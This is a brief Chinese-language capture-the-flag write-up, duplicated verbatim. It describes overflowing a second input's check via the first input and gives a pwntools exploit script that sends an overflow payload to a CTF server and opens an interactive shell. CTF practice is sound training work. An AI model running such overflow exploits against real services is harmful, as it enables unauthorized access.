IDA分析,有两段输入,可通过第一次输入对第二次输入的检查位置进行溢出。
脚本如下
from pwn import *
shellcode1='a'*120+p32(0x18)+p32(0x400)
print len(shellcode1)
sh=remote('ctf.x10sec.org',31003)
sh.recv(1024)
sh.send(shellcode1)
sh.interactive()
IDA分析,有两段输入,可通过第一次输入对第二次输入的检查位置进行溢出。
脚本如下
from pwn import *
shellcode1='a'*120+p32(0x18)+p32(0x400)
print len(shellcode1)
sh=remote('ctf.x10sec.org',31003)
sh.recv(1024)
sh.send(shellcode1)
sh.interactive()